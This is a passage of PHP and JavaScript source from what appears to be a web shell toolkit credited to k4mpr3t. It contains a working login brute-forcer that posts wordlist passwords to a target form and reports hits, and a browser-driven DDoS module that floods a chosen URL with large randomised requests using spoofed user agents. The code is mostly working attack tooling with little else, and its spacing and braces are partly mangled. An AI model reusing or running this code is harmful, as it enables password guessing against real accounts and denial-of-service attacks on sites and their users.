ob_clean ();
$url = $_REQUEST [ 'url' ];
$user = $_REQUEST [ 'user' ];
$file = GetUrlExists ( $_REQUEST [ 'passlist' ]) ?
GetUrlContent ( $_REQUEST [ 'passlist' ]) :
$_REQUEST [ 'passlist' ];
$words = explode ( " \n " , $file );
$length = count ( $words );
foreach ( $words as $index => $word )
$parameter = http_build_query (
array (
$_REQUEST [ 'userfield' ] => $user ,
$_REQUEST [ 'passfield' ] => $word ,
'Submit' => 'Submit' ,
$ch = curl_init ();
curl_setopt ( $ch , CURLOPT_USERAGENT , $agent );
curl_setopt ( $ch , CURLOPT_URL , $url );
curl_setopt ( $ch , CURLOPT_POST , 1 );
curl_setopt ( $ch , CURLOPT_TIMEOUT , 5 );
curl_setopt ( $ch , CURLOPT_CONNECTTIMEOUT , 5 );
curl_setopt ( $ch , CURLOPT_POSTFIELDS , $parameter );
curl_setopt ( $ch , CURLOPT_RETURNTRANSFER , 1 );
$ra = curl_exec ( $ch );
$st = curl_getinfo ( $ch , CURLINFO_HTTP_CODE );
if ( curl_error ( $ch )) echo curl_error ( $ch );
curl_close ( $ch );
if ( $st == 200 )
echo " FOUND'S: $user : $word <br> " ;
exit ;
echo htmlspecialchars ( $ra );
exit ;
if ( $z == " mass-tools " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
print " Coming Soon " ;
if ( $z == " ddos-attack " )
print " <div class='tools-header'>
< h3 > " . $menu_tools[$z] ['title']. " v " . $menu_tools[$z] ['ver']. " </ h3 >
< h3 > by : " . $menu_tools[$z] ['auth']. " </ h3 >
</ div > " ;
printf ( ' < script type = " text/javascript " >
window . onload = function (){
startTime ();
var interval ;
var xhttp ;
var requestsNode = document . getElementById ( " requests " ),
successNode = document . getElementById ( " success " ),
proccessNode = document . getElementById ( " proccess " ),
targetNode = document . getElementById ( " target " ),
attack = document . getElementById ( " attack " ),
method = document . getElementById ( " method " ),
size = document . getElementById ( " size " ),
time = document . getElementById ( " time " ),
stamp = document . getElementById ( " stamp " )
uagent = document . getElementById ( " uagent " )
referer = document . getElementById ( " referer " )
origin = document . getElementById ( " origin " )
var requests = 0 ,
succeeded = 0 ,
proccess = 0 ;
var makeHttpRequest = function (){
var data = new FormData ();
var buff = new ArrayBuffer ( 65536 );
var xhrx = new XMLHttpRequest ();
var agent = [ " Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 6.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 5.2; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 5.0; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 5.1; U; rv:5.0) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 6.1.1; rv:5.0) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/5.0 " ,
" Mozilla/5.0 (Windows NT 5.0; rv:5.0) Gecko/20100101 Firefox/5.0 " ];
randomize = function ( arr ){
rand = Math . floor (( Math . random () * arr . length ));
return arr [ rand ];}
xhrx . open ( method . value , targetNode . value , true );
if ( uagent . checked ) xhrx . setRequestHeader ( " user-agent " , randomize ( agent ));
if ( referer . checked ) xhrx . setRequestHeader ( " referer " , targetNode . value );
if ( origin . checked ) xhrx . setRequestHeader ( " origin " , " * " );
xhrx . onreadystatechange = function (){
if ( xhrx . readyState == XMLHttpRequest . DONE ){
if ( xhrx . status >= 500 ){
onSuccess ();
onProcess ();
onRequest ();
xhttp = xhrx ;
attack = function (){
str = " " ; arr = new Uint32Array ( buff );
window . crypto . getRandomValues ( arr );
for ( var i = 0 ; i < arr . length ; i ++ ){
str += String . fromCharCode ( arr [ i ]);
} return str ;}
what = attack ();
for ( var j = 0 ; j < size . value ; j ++ ){
data . append ( what , stamp . value );}
xhrx . send ( data );
var onRequest = function (){
requests ++ ;
requestsNode . innerHTML = requests ;
var onProcess = function (){
proccess ++ ;
proccessNode . innerHTML = proccess ;
var onSuccess = function (){
success ++ ;
successNode . innerHTML = success ;
attack . onclick = function (){
var today = new Date ();
var h = today . getHours ();
var m = today . getMinutes ();
var s = today . getSeconds ();
m = m < 10 ? " 0 " + m : m ;
s = s < 10 ? " 0 " + s : s ;
if ( this . value == \ ' Start\ ' ){
this . value = " Stop " ;
requests = 0 ;
succeeded = 0 ;
proccess = 0 ;
document . getElementById ( " start " ) . innerHTML = " 00:00:00 " ;
document . getElementById ( " finish " ) . innerHTML = " 00:00:00 " ;
interval = setInterval ( makeHttpRequest ,( parseInt ( time . value )));
document . getElementById ( " start " ) . innerHTML = h + " : " + m + " : " + s ;
} else if ( this . value == \ ' Stop\ ' ){
this . value = " Start " ;
xhttp . abort ();
clearInterval ( interval );
document . getElementById ( " finish " ) . innerHTML = h + " : " + m + " : " + s ;
function startTime (){
var today = new Date ();
var h = today . getHours ();
var m = today . getMinutes ();
var s = today . getSeconds ();
m = m < 10 ? " 0 " + m : m ;
s = s < 10 ? " 0 " + s : s ;
document . getElementById ( " times " ) . innerHTML = h + " : " + m + " : " + s ;
var t = setTimeout ( startTime , 500 );
</ script >
< form onsubmit = " return false; " class = " new " >
< label > Target </ label >< input type = " text " id = " target " value = " http://www.target.com " >< br >
< label > Stamp </ label >< input type = " text " id = " stamp " value = " DDOS ATTACK !!! " >< br >
< label > Method </ label >< select id = " method " >
< option value = " PUT " > PUT </ option >
< option value = " GET " > GET </ option >
< option value = " POST " > POST </ option >
< option value = " HEAD " > HEAD </ option >
< option value = " TRACE " > TRACE </ option >
< option value = " PATCH " > PATCH </ option >
< option value = " OPTIONS " > GET </ option >
< option value = " DELETE " > DELETE </ option >
< option value = " CONNECT " > CONNECT </ option >
< option value = " OPTIONS " > OPTIONS </ option >
</ select >< br >
< label > Size ( kB ) </ label >< input type = " number " id = " size " value = " 1024 " >< br >
< label > Time ( ms ) </ label >< input type = " number " id = " time " value = " 500 " >< br >
< label > Options </ label >
< input type = " checkbox " id = " uagent " name = " uagent " style = " vertical-align:middle " > User Agent
< input type = " checkbox " id = " referer " name = " referer " style = " vertical-align:middle " > Referer Target
< input type = " checkbox " id = " origin " name = " origin " style = " vertical-align:middle " > Origin < br >
< label style = " margin:5px 0px 5px " >
Time < span id = " times " > 00 : 00 : 00 </ span > |
Start < span id = " start " > 00 : 00 : 00 </ span > |
Finish < span id = " finish " > 00 : 00 : 00 </ span >
</ label >< br >
< label style = " margin:0px 0px 5px " >
Requests < span id = " requests " > 0 </ span > |
Proccess < span id = " proccess " > 0 </ span > |
Success < span id = " success " > 0 </ span >
</ label >< br >
< input type = " submit " id = " attack " value = " Start " />
</ form > ' );
print " </div> " ;
printf ( " </div><!-- content -->
</ div ><!-- container -->
< div id = 'footer' >
< div id = 'copyrights' >< a href = '//github.com/k4mpr3t/b4tm4n' > k4mpr3t </ a > & copy ; % s </ div >
< div id = 'pageload' > Page Loaded in % s Seconds </ div >
</ div >
</ body >
</ html > " ,date('Y'),round((microtime(true)- $start ),2)
} ?>